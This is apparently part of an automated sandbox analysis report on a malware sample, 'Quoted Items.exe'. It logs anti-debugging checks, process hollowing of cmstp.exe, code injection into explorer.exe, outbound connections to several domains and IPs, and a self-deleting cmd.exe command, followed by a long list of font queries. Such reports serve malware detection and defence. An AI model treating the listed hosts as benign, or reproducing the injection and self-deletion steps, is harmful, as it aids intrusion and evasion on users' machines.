Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF

Source: C:\Users\user\Desktop\Quoted Items.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe

Code function: 4_2_00409B30 LdrLoadDll,

4_2_00409B30

Source: C:\Users\user\Desktop\Quoted Items.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.zhouyihong.top
Source: C:\Windows\explorer.exe	Network Connect: 180.76.158.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.gratefulgrandmas.com
Source: C:\Windows\explorer.exe	Domain query: www.royaltortoisecookieco.online
Source: C:\Windows\explorer.exe	Network Connect: 172.217.168.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 209.17.116.163 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Quoted Items.exe

Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1230000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Quoted Items.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quoted Items.exe

Memory written: C:\Users\user\Desktop\Quoted Items.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Quoted Items.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Quoted Items.exe	Thread register set: target process: 3968			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 3968			Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe	Process created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"			Jump to behavior

Source: explorer.exe, 00000005.00000000.305101849.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.326753405.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.374845928.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000005.00000000.331301300.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.298445509.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.326871038.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.374983831.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.288291734.0000000000708000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Users\user\Desktop\Quoted Items.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
